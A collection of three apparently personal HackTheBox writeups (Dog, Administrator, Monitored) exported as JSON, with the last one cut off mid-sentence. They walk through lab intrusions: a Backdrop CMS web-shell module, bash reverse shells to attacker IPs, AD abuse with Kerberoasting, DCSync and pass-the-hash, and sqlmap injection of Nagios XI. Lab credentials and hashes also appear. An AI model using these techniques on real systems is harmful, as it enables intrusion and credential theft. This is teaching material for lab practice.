[
  {
    "title":     "HackTheBox - Dog Writeup",
    "permalink": "/posts/dog/",
    "date":      "jan 07 2025",
    "summary":   "Credential exposure via an open Git repository leads to admin access on BackdropCMS, a web shell foothold, and ultimately root via a misconfigured sudo permission on bee.",
    "tags":      ["HackTheBox"],
    "type":      "posts",
    "content":   "This machine is an easy rated Linux machine. This writeup will demonstrate how I was able to run commands in the context of the root user. This box involves reading sensitive data found in an exposed git repository leading to access to an admin user on BackdropCMS. With these privileges we are able to find an exploit that allows us to build a malicious module in the form of a web shell. This is used to gain an initial foothold with a reverse shell. Taking a list of users and reusing the password we have will allow logging in as the user johncusack. After accessing this account and observing the sudo permissions, it is seen that it can run a binary called bee with sudo permission. Using this tool with sudo access allows an attacker to run commands in the context of the root user.\nScanning I start by running rustscan to quickly get a list of the ports that are open on this machine:\n1rustscan -g -a 10.129.20.215 --ulimit 5000 From rustscan, we will see that the following ports are returned in a list, this format is given by using the -g flag with rustscan:\n122,80 The ports found by rustscan are passed to nmap using the -p flag:\n1nmap -p 22,80 -sC -sV -oA Nmap/rustports 10.129.20.215 The nmap scan returns the following output:\n1PORT STATE SERVICE VERSION 222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0) 3| ssh-hostkey: 4| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA) 5| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA) 6|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519) 780/tcp open http Apache httpd 2.4.41 ((Ubuntu)) 8| http-git: 9| 10.129.20.215:80/.git/ 10| Git repository found! 11| Repository description: Unnamed repository; edit this file \u0026#39;description\u0026#39; to name the... 12|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro... 13|_http-server-header: Apache/2.4.41 (Ubuntu) 14|_http-generator: Backdrop CMS 1 (https://backdropcms.org) 15|_http-title: Home | Dog 16| http-robots.txt: 22 disallowed entries (15 shown) 17| /core/ /profiles/ /README.md /web.config /admin 18| /comment/reply /filter/tips /node/add /search /user/register 19|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply 20Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Visiting the site about page we can see the domain dog.htb being used, this can be added to the /etc/hosts file.\n1echo -e \u0026#39;10.129.242.10\\tdog.htb\u0026#39; | sudo tee -a /etc/hosts Enumerating the Git Repository From the nmap output we can see that a git repository was found. We can navigate to this at http://dog.htb/.git/. We can use a tool called git-dumper to get the contents of this git repository.\n1git-dumper http://dog.htb/.git Git Inside the repo we can find a file called settings.php. Inside this file we can find a database connection string:\n1$database = \u0026#39;mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop\u0026#39;; 2$database_prefix = \u0026#39;\u0026#39;; Doing a recursive search over the Git directory we have, we can find a username - tiffany@dog.htb.\nUsing the password we found in settings.php and this username, we are able to login to the admin interface of the website:\n1tiffany@dog.htb:BackDropJ2024DS2024 Exploiting Backdrop CMS Navigating to http://dog.htb/?q=admin/people/list we can see a list of the users of the site.\nThere is a \u0026ldquo;Reports\u0026rdquo; section in the admin menu bar. Clicking into here there is the option to view available updates for plugins/themes/etc. This is located at http://dog.htb/?q=admin/reports/updates. Looking in here we can see that the site is currently using version 1.27.1 of backdrop.\nI had a look for exploits against this version and got a hit on exploitDB. We can query this database in the terminal using searchsploit:\n1searchsploit backdrop 1.27.1 2searchsploit -m 52021.py Reviewing the Backdrop CMS Exploit Code In this script we can see that it is expecting us to pass in the URL as a sysarg:\n1if __name__ == \u0026#34;__main__\u0026#34;: 2 import sys 3 if len(sys.argv) \u0026lt; 2: 4 print(\u0026#34;Usage: python script.py [url]\u0026#34;) 5 else: 6 main(sys.argv[1]) In this script we see that it creates two files, shell.info and shell.php. For our purposes, we are more interested in what shell.php is doing. We can see that it is creating a webshell for us by creating a form, taking a cmd value, then passing that to system() to be executed. The below extract is from the create_files() function where this happens:\n1shell_content = \u0026#34;\u0026#34;\u0026#34; 2 \u0026lt;html\u0026gt; 3 \u0026lt;body\u0026gt; 4 \u0026lt;form method=\u0026#34;GET\u0026#34; name=\u0026#34;\u0026lt;?php echo basename($_SERVER[\u0026#39;PHP_SELF\u0026#39;]); ?\u0026gt;\u0026#34;\u0026gt; 5 \u0026lt;input type=\u0026#34;TEXT\u0026#34; name=\u0026#34;cmd\u0026#34; autofocus id=\u0026#34;cmd\u0026#34; size=\u0026#34;80\u0026#34;\u0026gt; 6 \u0026lt;input type=\u0026#34;SUBMIT\u0026#34; value=\u0026#34;Execute\u0026#34;\u0026gt; 7 \u0026lt;/form\u0026gt; 8 \u0026lt;pre\u0026gt; 9 \u0026lt;?php 10 if(isset($_GET[\u0026#39;cmd\u0026#39;])) 11 { 12 system($_GET[\u0026#39;cmd\u0026#39;]); 13 } 14 ?\u0026gt; 15 \u0026lt;/pre\u0026gt; 16 \u0026lt;/body\u0026gt; 17 \u0026lt;/html\u0026gt; 18 \u0026#34;\u0026#34;\u0026#34; 19 shell_php_path = \u0026#34;shell/shell.php\u0026#34; 20 with open(shell_php_path, \u0026#34;w\u0026#34;) as file: 21 file.write(shell_content) 22 return shell_info_path, shell_php_path We then see that these two files are bundled into a zip file to be uploaded as a module. This takes place in the create_zip() function:\n1def create_zip(info_path, php_path): 2 zip_filename = \u0026#34;shell.zip\u0026#34; 3 with zipfile.ZipFile(zip_filename, \u0026#39;w\u0026#39;) as zipf: 4 zipf.write(info_path, arcname=\u0026#39;shell/shell.info\u0026#39;) 5 zipf.write(php_path, arcname=\u0026#39;shell/shell.php\u0026#39;) 6 return zip_filename Uploading the Backdrop CMS Exploit Payload After running the script, we can see that it drops a malicious PHP webshell in a zip file that we will now need to upload.\n1python 52021.py http://10.129.231.223 I was trying to get this exploit to work using http://dog.htb but it would not work until I used the IP address of the machine instead.\nWe can now navigate to http://dog.htb/admin/modules/install as the exploit is telling us and upload the malicious zip through a manual install.\nI removed the shell.zip file and instead compressed the payload directory with tar:\n1tar -cvf shell.tar shell Now when we upload, we see a success message from http://dog.htb/core/authorize.php.\nGetting a Reverse Shell with the Web Shell Now we can check to see if the web shell is functioning by going to http://dog.htb/modules/shell/shell.php.\nIn my case, going to this link shows that it was successful and we can run commands.\nThis shell seems to be getting deleted so I prepared a reverse shell payload to launch against it.\n1bash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.166/4444 0\u0026gt;\u0026amp;1\u0026#34; I then got a netcat listener running so that after executing this in the webshell I could catch a session.\n1nc -nvlp 4444 After executing the reverse shell payload we can check our listener and see that we have a session on the box.\nEnumerating the Machine as www-data Navigating to /home we can see there are two home directories. We can find user.txt in /home/johncusack, however, we do not have permission to read it.\nWe will need a working directory, /tmp looks like a good location. Looking in here we will see the files we were submitting for a new module. I am going to move linpeas on to the box to enumerate it. To do this I will locate it on my Kali machine, move it to my working directory, and start a Python HTTP server. I will then use curl on the victim machine to get it.\n1#KALI 2locate linpeas 3cp /usr/share/peass/linpeas/linpeas.sh . 4python3 -m http.server 80 5 6#VICTIM 7curl http://10.10.14.166/linpeas.sh -o /tmp/linpeas.sh We do not have execute permission against linpeas, so we will modify the permissions to allow us to do this.\n1chmod +x linpeas.sh Getting an SSH Session as johncusak After a quick check over the output and not seeing anything to use, I went back to the password found earlier and tested it against the users who had home directories. Doing this, I was able to get an SSH session as johncusack:BackDropJ2024DS2024.\nssh johncusack@dog.htb I was now out of the docker environment and was able to obtain the user flag for this box.\nSudo Permission on Bee Having a look at the sudo access of johncusack using sudo -l we can see that there is sudo access to usr/local/bin/bee.\nI started searching to see what this binary was and found out that it is a command line utility for Backdrop CMS - https://github.com/backdrop-contrib/bee\nLooking at the the help menu by running sudo /usr/local/bin/bee, we can see that there is the option to run PHP code using eval.\nTrying to run this command was failing showing that the required bootstrap level was not ready.\nI looked back to the top of the help menu and saw that there should be a root of the Backdrop install.\nCollecting the Root Flag I went back to the shell I had as www-data and saw that the shell landed in /var/www/html/modules/shell which can be seen in the earlier screenshot. This was making me think that /var/www/html was the root since the modules build off here. I moved to this directory and ran the same eval command and was able to obtain the root flag.\n1sudo /usr/local/bin/bee ev \u0026#34;system(\u0026#39;cat /root/root.txt\u0026#39;)\u0026#34; "
  },
  {
    "title":     "HackTheBox - Administrator Writeup",
    "permalink": "/posts/administrator/",
    "date":      "jan 05 2025",
    "summary":   "A WinRM foothold leads to a chain of AD abuse — GenericAll, ForceChangePassword, GenericWrite, Kerberoasting, and DCSync — culminating in Domain Admin after cracking a PSafe3 password manager file.",
    "tags":      ["HackTheBox"],
    "type":      "posts",
    "content":   "This machine is a retired medium rated Windows box. We are given the credentials to a user account that will give us our initial foothold. After our initial scanning we can see the services that are running and we get an easy access point using the olivia account over WinRM. Following on from here, we will need to use SharpHound as a collector for Bloodhound and do some AD enumeration. This will become important as we will need to come back to refer to it several times. In this box we will see the abuse of GenericAll, ForceChangePassword, GenericWrite, Kerberoasting, and DCSync for our AD attack vectors. We will also see some cracking of a password manager file in a psafe3 format. This box required quite a few user pivots before getting to the domain administrator.\nScanning To get a quick overview of the open ports on the machine I ran rustscan.\n1rustscan -g -a 10.129.244.185 --ulimit 5000 With the addition of the -g flag we are able to get the ports in a comma seperated list.\n110.129.244.185 -\u0026gt; [21,53,88,135,139,389,445,464,593,3268,5985,9389,47001,49665,49664,49668,49666,49667,63818,63823,63828,63839,63850,63882] The ports found by rustscan are now passed into the nmap scan under the -p flag.\n1nmap -p 21,53,88,135,139,389,445,464,593,3268,5985,9389,47001,49665,49664,49668,49666,49667,63818,63823,63828,63839,63850,63882 -sC -sV -oA Nmap/rustports 10.129.244.185 The nmap scan results in the following output:\n1PORT STATE SERVICE VERSION 221/tcp open ftp Microsoft ftpd 3| ftp-syst: 4|_ SYST: Windows_NT 553/tcp open domain Simple DNS Plus 688/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-05 02:05:47Z) 7135/tcp open msrpc Microsoft Windows RPC 8139/tcp open netbios-ssn Microsoft Windows netbios-ssn 9389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 10445/tcp open microsoft-ds? 11464/tcp open kpasswd5? 12593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 133268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 145985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 15|_http-server-header: Microsoft-HTTPAPI/2.0 16|_http-title: Not Found 179389/tcp open mc-nmf .NET Message Framing 1847001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 19|_http-server-header: Microsoft-HTTPAPI/2.0 20|_http-title: Not Found 2149664/tcp open msrpc Microsoft Windows RPC 2249665/tcp open msrpc Microsoft Windows RPC 2349666/tcp open msrpc Microsoft Windows RPC 2449667/tcp open msrpc Microsoft Windows RPC 2549668/tcp open msrpc Microsoft Windows RPC 2663818/tcp open msrpc Microsoft Windows RPC 2763823/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 2863828/tcp open msrpc Microsoft Windows RPC 2963839/tcp open msrpc Microsoft Windows RPC 3063850/tcp open msrpc Microsoft Windows RPC 3163882/tcp open msrpc Microsoft Windows RPC 32Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows 33 34Host script results: 35| smb2-security-mode: 36| 3:1:1: 37|_ Message signing enabled and required 38|_clock-skew: 7h00m00s 39| smb2-time: 40| date: 2025-05-05T02:06:43 41|_ start_date: N/A 42 43Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 44Nmap done: 1 IP address (1 host up) scanned in 69.30 seconds Since we can see that 5985 is open, we can test out the credentials provided to us.\nEvil-WinRM - Olivia - Initial Access We can attempt to use the open WinRM service to log in with the olivia user. We are able to do this using the tool evil-winrm.\n1evil-winrm -i 10.129.244.185 -u olivia -p ichliebedich Enumerating - WinPeas and SharpHound Now that we have a foothold on the machine, we can start to enumerate the machine with WinPeas to see if we can get anything from examining the host.\n1#KALI 2locate -i winpeas 3cp /usr/share/peass/winpeas/winPEASx64.exe . 4 5#VICTIM 6upload ./Payload/winPEASx64.exe During my enumeration, I was not finding anything useful. Since we know we are looking at a domain controller, AD could be the attack vector. We will need to move a collector on to the machine and get a zip file to upload into BloodHound. In my case I used SharpHound. To upload it to the machine I did the following:\n1#KALI 2locate -i sharphound 3cp /opt/BloodHound-Legacy/Collectors/SharpHound.ps1 . 4 5#VICTIM 6upload ./Payload/SharpHound.ps1 Now that it is on the machine, we need to import it into our session so that we can run the collector:\n1powershell -ep bypass 2. .\\SharpHound.ps1 3Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\\Users\\olivia\\Documents -OutputPrefix administrator Now that we have the zip file generated, we can move it back to our Kali host to analyse it.\n1download administrator_20250504195007_BloodHound.zip BloodHound Enumeration Now we will need to start neo4j and run BloodHound:\n1sudo neo4j start \u0026amp; 2sudo bloodhound \u0026amp; Now we can use the upload data button and import the zip file we generated for analysis. Once everything is loaded in, we can make a start.\nFirst I start by looking at the users we have using a cypher query:\n1MATCH(m:User) RETURN m We can right click olivia and mark this user as owned.\nClicking into olivia and examining the node info, we see under the Outbound Object Control section, in the First Degree Object control, that olivia has GenericAll privilege over michael.\nGaining Access to Michael Right clicking the GenericAll, we can open the help menu. Looking through this, we can see that we have the option to reset the password of the user.\n1net user michael Password123 /domain With this change of password, we can now connect to the machine as michael using evil-winrm.\n1evil-winrm -i 10.129.244.185 -u michael -p Password123 BloodHound Enumeration - Michael Going back to BloodHound we can check the First Degree Object Control michael has. We can see that he has ForceChangePassword privilege over the user benjamin.\nGaining Access to Benjamin I was trying to use the same net.exe method to change the password, but this was resulting in a \u0026ldquo;system error 5\u0026rdquo;. As an alternative, I started by moving PowerSploit into my Payloads directory.\n1cp /opt/PowerSploit/Recon/PowerView.ps1 ./Payloads I then uploaded this to the machine:\n1upload ./Payloads/PowerView.ps1 We can now set the execution policy to bypass and import the module.\n1powershell -ep bypass 2. .\\PowerView.ps1 Now we can set a new password for the user benjamin:\n1$SecPassword = ConvertTo-SecureString \u0026#39;Password123\u0026#39; -AsPlainText -Force 2$Cred = New-Object System.Management.Automation.PSCredential(\u0026#39;administrator.htb\\benjamin\u0026#39;, $SecPassword) 3$UserPassword = ConvertTo-SecureString \u0026#39;Password123\u0026#39; -AsPlainText -Force 4Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword Checking Access as Benjamin If we try to use evil-winrm with benjamin, we are not able to get a session, however, we can connect to SMB.\n1smbclient -U \u0026#39;administrator.htb/benjamin%Password123\u0026#39; -L //10.129.244.185 This does not result in anything, however, in the nmap output we can see that FTP is running. Attempting to connect to this as benjamin is successful. Looking at the contents in this directory, we see that there is a file called Backup.psafe3.\n1ftp benjamin@10.129.244.185 2get Backup.psafe3 We can use the file command to see what it is:\n1file Backup.psafe3 Password Safe V3 - How do I Exploit This? Looking up \u0026ldquo;password safe v3\u0026rdquo;, we come across a GitHub repository. Inside the Linux readme we can see that it is in the apt repo.\n1sudo apt install passwordsafe Looking up \u0026ldquo;psafe3 password cracking\u0026rdquo; we see that hashcat supports cracking this.\nWe can now run hashcat against the psafe3 file:\n1hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt We see this is successful and get the password for this file: tekieromucho\nLooking inside the password manager, we find credentials for alexander, emily, and emma.\nLooking through these, we can collect the following:\n1alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw 2emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb 3emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur More BloodHound Enumeration - Password Manager Accounts I went back to BloodHound to see if any of these users had anything that could be useful to me. I could see that emily had GenericAll privileges over ethan.\nGaining Access to Emily - User Flag I tried the creds obtained for emily and was able to get a session through evil-winrm. We are also able to obtain the user flag at this point.\n1evil-winrm -i 10.129.244.185 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb Kerberoasting Ethan Now we need to get PowerView on the machine again.\n1upload ./Payloads/PowerView.ps1 2powershell -ep bypass 3. .\\PowerView.ps1 Looking at the help section in BloodHound, we see that we can perform a kerberoast attack. I was trying to follow the steps to do this from the Blazorized box, however, I was getting a .ctor error.\nThis is showing that the credentials being provided for the SPN are wrong. I went back over the instructions given in BloodHound and was able to get this working.\n1Set-DomainObject -Identity ethan -SET @{serviceprincipalname=\u0026#39;hack/pwn\u0026#39;} 2$SecPassword = ConvertTo-SecureString \u0026#39;UXLCI5iETUsIBoFVTj8yQFKoHjXmb\u0026#39; -AsPlainText -Force 3$Cred = New-Object System.Management.Automation.PSCredential(\u0026#39;Administrator.htb\\emily\u0026#39;, $SecPassword) 4Get-DomainSPNTicket -Credential $Cred hack/pwn | fl Cracking the Hash We need to clean up this hash so that it is valid:\n1$krb5tgs$23$*UNKNOWN$UNKNOWN$hack/pwn*$F44DB88759B3C950E4D3E2AE81852C51$35A49078244CB2F315EE202F978FEA1B740B768AAAF4CCFAF2CA8B9563C0C32B6EA61392221EA5F0C508BC9E7D4F1476E5C1CDD22EFAC73DD7DAB82050DC2ACFD16F835B9AE5323B3D09F807068BEA56A566671594D65AF0C7BD5B0A5CC506BF0B79EF30D754C1A1F3893741A5D818893142E92A9F67E9FAB086BC4AEB89338C0112281C6A9FC8288D1CAF3E177ABACFF394118FF7F60FD72E84AB74762988AA0246BA2526B17BFE5A3730BA41118172BC38361B30588F801F2A01B842AF8EB9F9E99F0902BEF8B84C759B92D56CF5FD782D7537DC7FAC694B11B222FCA86A8AF8406FF791A7F272E745E25F9684A9EE371A6D7692AD61967BFC4947B75F027B3073CB5D3DF493EA9B716AC5583DD7515303E9AB0182B5BC587291FDBB17F7592458A6BEFDE6B662CD6BDD2F700E9CAACC47CB9CC528F74DD8F4751FDFDB4AEC6FACDD4A909A63D699499711C6CB3537C051F5B36A76378F5DD282E9331AFD10A2C07347B4D67595B78925A601152AFB5E8B56F2BD5A07D244C3F9F7C647DC14FF838C482510E44A1802123F243E4916EDEFB62C7D84021D92533E3FB63F5755B6E2215DC497380E0DFFD7B9FF64367E896A22E30DB817FF44D07EA3E2F00F3FCF839185F216291791B8A34A1873C9C984990DF2CEE6CFC05C6612DC3E56A70742E7AFA873C0746079A6B3661B47D1B9507EB1940DB24519A9BA6B891729E68E2340DF8FDC48B003C97364C1CBF8EBCF2A1BA985A9D498B701F586E9A6E45BFC1E391724BBCA2CC6A61F0EFE28ED805898104EB56B2311DB4351FB3E6DAFE25B782A7B008630E7119A54E030A1AF7FA98DD9086F48B79424E0D66C504F3DC973431773958B0B02B31BC1B80FF599434C9A00D96067A1F30A4DA9E3CDBE60B1351FFD0D5FDA743952E605FA61A4F70FC4532A2756D9500995C862902939986E74AACDCD436EE957A4F8BA9C211101E989070AFFDCC238B775EC8C3E0254C2B258B12C274053B63515DF1B44184F832AD7B08BDD835C1E83590DB9510B3829A7365672ED2E9D4BE773B5CF4CFEF28912522E319D41A231B924E2AAC27042C954266EC9F82DFFB703B391C686BC8F67AE6C98283081E48CE04677D3895B7F49E9C50E22470AAF2F8BF35266C3FE72D775935A7A58C43570099E0659737B9B134D80A0B1CE704F16FA8A51F72286814289185BB81D6EB4D89F25AE6F7EFCC5F36635BD9E1182D4988AE6609D558D6B4C8FF623DC461C4692CB39511071EF2B220F5E46B3834D51FA9E0D0EFA340EF5EA770504FA38EFAF019AF2DDB07D3F6C418DBC4CE160C2ED086AC9AADCA8F9ED33FB33AD7586938C1C73B7B8A1DC5729EC38EE9EADD4D40844AB076215F1C26C52432A6F2ADF59E704BDE949E1DDA55CF1992E39DA0C7489C3EBD3FDC721D8A2A83AF05D8E3F6F917FF70ED69C76CEE33ECE30151E061AC5371814D1BDC025EE2986BE14C68CD0A29CAA8784F9CBE057A9BD95674B4FD22285D37D9D3654ED11701A4454D4120A0EEDEF3C62F8147064541421B94AF0CD5C4A0998406F559C5EAF4C103B5C14A454A40509B2FE00824377968E8C6E08EFAED10D54121D975FF829CB92FF490ABB3D74CDEDB67D3E915E0CC0DE14834577E0E37A3AB403B710B915357E1FBED9B2DEDDF00ECCF29F2693C235F072BF8DB95B5A8506D3AD1B848550F1D98BEE5A0B9B4FB44E69 I put this into a file called hackpwn.hash. I then used hashcat to crack this.\n1hashcat -m 13100 hackpwn.hash /usr/share/wordlist/rockyou.txt We see in the output that this is successful and we get the password limpbizkit.\nEthan - DCSync Looking at Ethan in BloodHound, we can see that the account has DCSync on the domain.\nTrying to use evil-winrm to get on the machine and use mimikatz to do an lsadump failed. I used impacket-secretsdmp to get the administrator\u0026rsquo;s NTLM hash, the IP is different here due to a reset:\n1impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.236.72 Evil-WinRM - Domain Administrator NTLM Hash Now we can connect to the machine using evil-winrm as the administrator:\n1evil-winrm -i 10.129.236.72 -u administrator -H \u0026#39;3dc553ce4b9fd20bd016e098d2d2fd2e\u0026#39; "
  },
  {
    "title":     "HackTheBox - Monitored Writeup",
    "permalink": "/posts/monitored/",
    "date":      "jan 26 2024",
    "summary":   "SNMP leaks credentials to abuse the API, a CVE steals the admin API key, and built-in functionality delivers a reverse shell before a sudo misconfiguration leads to root.",
    "tags":      ["HackTheBox"],
    "type":      "posts",
    "content":   "Monitored is a medium rated retired Linux machine on HackTheBox. In this walkthough I demonstrate how I was able to obtain root access to this machine. This box will require you to use SNMP to get credentials for a disabled account. You will then need to abuse the API to get an authentication token. Next, find the right CVE to steal the administrator\u0026rsquo;s API key. With this key you can start adding users with admin access. Built in functionality can be abused to get a reverse shell. With this reverse shell you can then escalate your privileges by abusing the sudo permissions provided to the user account.\nScanning and Enumeration To get a quick overview of the open ports on the machine I ran rustscan.\n1rustscan -g -a 10.129.255.211 --ulimit 5000 With the addition of the -g flag we are able to get the ports in a comma seperated list.\n110.129.255.211 -\u0026gt; [22,80,389,443,5667] The ports found by rustscan are now passed into the nmap scan under the -p flag.\n1nmap -p 22,80,389,443,5667 -sC -sV -oA Nmap/rustports 10.129.255.211 The nmap scan results in the following output:\n1PORT STATE SERVICE VERSION 222/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) 3| ssh-hostkey: 4| 3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA) 5| 256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA) 6|_ 256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519) 780/tcp open http Apache httpd 2.4.56 8|_http-server-header: Apache/2.4.56 (Debian) 9|_http-title: Did not follow redirect to https://nagios.monitored.htb/ 10389/tcp open ldap OpenLDAP 2.2.X - 2.3.X 11443/tcp open ssl/http Apache httpd 2.4.56 ((Debian)) 12|_ssl-date: TLS randomness does not represent time 13|_http-title: Nagios XI 14| tls-alpn: 15|_ http/1.1 16| ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK 17| Not valid before: 2023-11-11T21:46:55 18|_Not valid after: 2297-08-25T21:46:55 19|_http-server-header: Apache/2.4.56 (Debian) 205667/tcp open tcpwrapped 21Service Info: Host: nagios.monitored.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel The most interesting services from this are port 80/443. This will be the first target for enumeration.\nPort 80/443 - Discovering Nagios XI We see in the output of the nmap scan that port 80 is being redirected to https://nagios.monitored.htb/. We will need to add this to our /etc/hosts file to resolve the IP address of the machine to the FQDN given.\n1echo -e \u0026#39;10.129.255.211\\tnagios.monitored.htb\u0026#39; | sudo tee -a /etc/hosts With this added we can now visit the page and see the landing page for Nagios XI.\nClicking the \u0026ldquo;Access Nagios XI\u0026rdquo; button takes us to a page that has a login prompt. Trying to use default credentials fails here.\nAt this point I did not have credentials and further enumeration of what was provided in the nmap scan was proving useless.\nScanning UDP and Further Enumeration I wondered if there was a UDP service running that I was missing. To check this I ran another nmap scan:\n1sudo nmap -sU 10.129.255.211 This scan returned a service that I had run into before; SNMP.\n1 2PORT STATE SERVICE 368/udp open|filtered dhcpc 4123/udp open ntp 5161/udp open snmp 6162/udp open|filtered snmptrap On previous boxes I had been able to get credentials from SNMP so I was feeling optimistic and put my focus here.\nPort 161 - SNMP - Walking to Credentials The Hacktricks Pentesting SNMP guide is helpful for understanding what is going on with SNMP. Firstly we are going to want to be able to get the information stored in the MIB so we will need to know the community string. We can find a valid community string using the tool onesixtyone.\n1onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 10.129.255.211 From the output of onesixtyone, we learn that public is a valid community string.\n110.129.255.211 [public] Linux monitored 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64 We can now use the tool snmpwalk to retrieve the information found in the MIB.\n1snmpwalk -c public -v1 -t 10 10.129.255.211 In the output we can find this important output that provides us with a username of svc and their password XjH7VCehowpR1xZB.\n1HOST-RESOURCES-MIB::hrSWRunParameters.1380 = STRING: \u0026#34;-u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB\u0026#34; The Return to Nagios XI - Is That an API? Now that we have credentials, we might be able to SSH or login. Trying both of these will lead to failure. We see in an error message on Nagios XI that the account has been disabled or no longer exists.\nWhile using Feroxbuster to do some bruteforcing I came across something in the output that stood out as potentially interesting.\n1feroxbuster --url https://nagios.monitored.htb/nagiosxi/ -k --depth 2 In this output we see that there is a reference to /nagiosxi/api. We can continue to investigate this API and see what actions are available to us.\n1feroxbuster --url https://nagios.monitored.htb/nagiosxi/api -k --depth 2 We see that we get a 200 OK response on /nagiosxi/api/v1/authenticate.\nWith BurpSuite running and intercepting our traffic we can go and visit:\n1https://nagios.monitored.htb/nagiosxi/api/v1/authenticate. It will now appear in the HTTP history for us to have a look at it.\nWe see that it is expecting a POST request which was expected since it is handling authentication. We can right click the request and send it to Repeater. In the repeater tab we will want to right click the request and select the \u0026ldquo;Change request method\u0026rdquo; option. This will give use a valid POST request. Sending the request without any further data we will get the following response.\n1\u0026#34;error\u0026#34;:\u0026#34;Must be valid username and password.\u0026#34; We can guess that we need to send a username and password parameter pair. Checking the support posts we can see one that confirms this is the case.\nNow we can append the svc account credentials to this post request and see if we can get authenticated.\nIn the response we see that we are now given an auth token! Now we just need to figure out what we can do with it.\nIn the Nagios XI API documentation we can see the an auth token being used.\nI took a while trying out different things and looking for something that might let me login. It took a while but I finally wondered if the login page might allow me to give the token as a paramter\u0026hellip;\n1https://nagios.monitored.htb/nagiosxi/login.php?token=f400ecaf0b959b7d4eeb956fd5f0e57a20bc9f65 After submitting the auth token I now had access to the Nagios XI dashboard as the user svc.\nGot Access to Nagios XI - Next Steps Now we can start having a look around the application to see if there is anything we can exploit now that we are an authenticated user. In the bottom left we can see the version of the software identified as Nagios XI 5.11.0.\nLooking for exploits for this version we can see that there is a SQL injection vulnerability CVE-2023-40931.\nIn the provided PoC we can see that they are targetting the same HackTheBox machine so all we need to do is change the session cookie to our one which can be found in the browser.\n1sqlmap -u \u0026#34;https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php\u0026#34; --data=\u0026#34;id=3\u0026amp;action=acknowledge_banner_message\u0026#34; --cookie \u0026#34;nagiosxi=j5sjd8o9v911c9cin99713ko43\u0026#34; --dbms=MySQL --level=1 --risk=1 -D nagiosxi -T xi_users --dump We can accept all of the default values provided. We will see that we are able get a dump of the xi_users table from the nagiosxi database:\nIt is very hard to read the table in the terminal so we can open the csv file generated in LibreOffice Calc for an easier time:\n1/home/\u0026lt;user\u0026gt;/.local/share/sqlmap/output/nagios.monitored.htb/dump/nagiosxi/xi_users.csv In this file we can see that there are usernames and password hashes.\nTrying to crack these hashes fails so we will take the API keys instead and see what we can do with these.\nUsing the API to Add Admin Users in Nagios XI Looking at the Nagios forum we can see how to add a user using an API key. We will use the admin user\u0026rsquo;s API key to do this:\n1curl -XPOST \u0026#34;https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\u0026amp;pretty=1\u0026#34; -d \u0026#34;username=hacker\u0026amp;password=hack\u0026amp;name=Hacker%20Pwned\u0026amp;email=hacker@localhost\u0026#34; After executing this command we see that our user has been added:\nThe forum post linked to above mentioned API documentation. The API documentation I could find was pretty poor so I instead opted to go back to Google to try and find the answer I was looking for.\nSearching for nagios xi \u0026quot;api/v1/system/user\u0026quot; we find a forum post discussing creating an account with the auth_level being set in the POST request. In this case, I tried to add an admin user.\n1curl -XPOST \u0026#34;https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\u0026amp;pretty=1\u0026#34; -d \u0026#34;username=pwned\u0026amp;password=hack\u0026amp;name=Hacker%20Pwned\u0026amp;email=hacker@localhost\u0026amp;auth_level=admin\u0026#34; -k We see that this request is successful. We should now have access to an admin user.\nLogging in to the admin user we created and looking at the buttons in the menu we see a nice admin option is available now.\nGetting a Reverse Shell Under the configure option from the navigation menu, we see that we can access the \u0026ldquo;Core Config Manager\u0026rdquo; which has commands stored in it.\nLooking at the list of commands currently in use, we can see one that makes a call to /usr/bin/php maybe we can add one that will create a reverse shell for us.\nWe will add a new command with the following payload:\n1bash -c \u0026#39;/bin/bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.16.31/4443 0\u0026gt;\u0026amp;1\u0026#39; We see that we need to apply the new config so we can use it.\nWe are taken to the following page to apply the 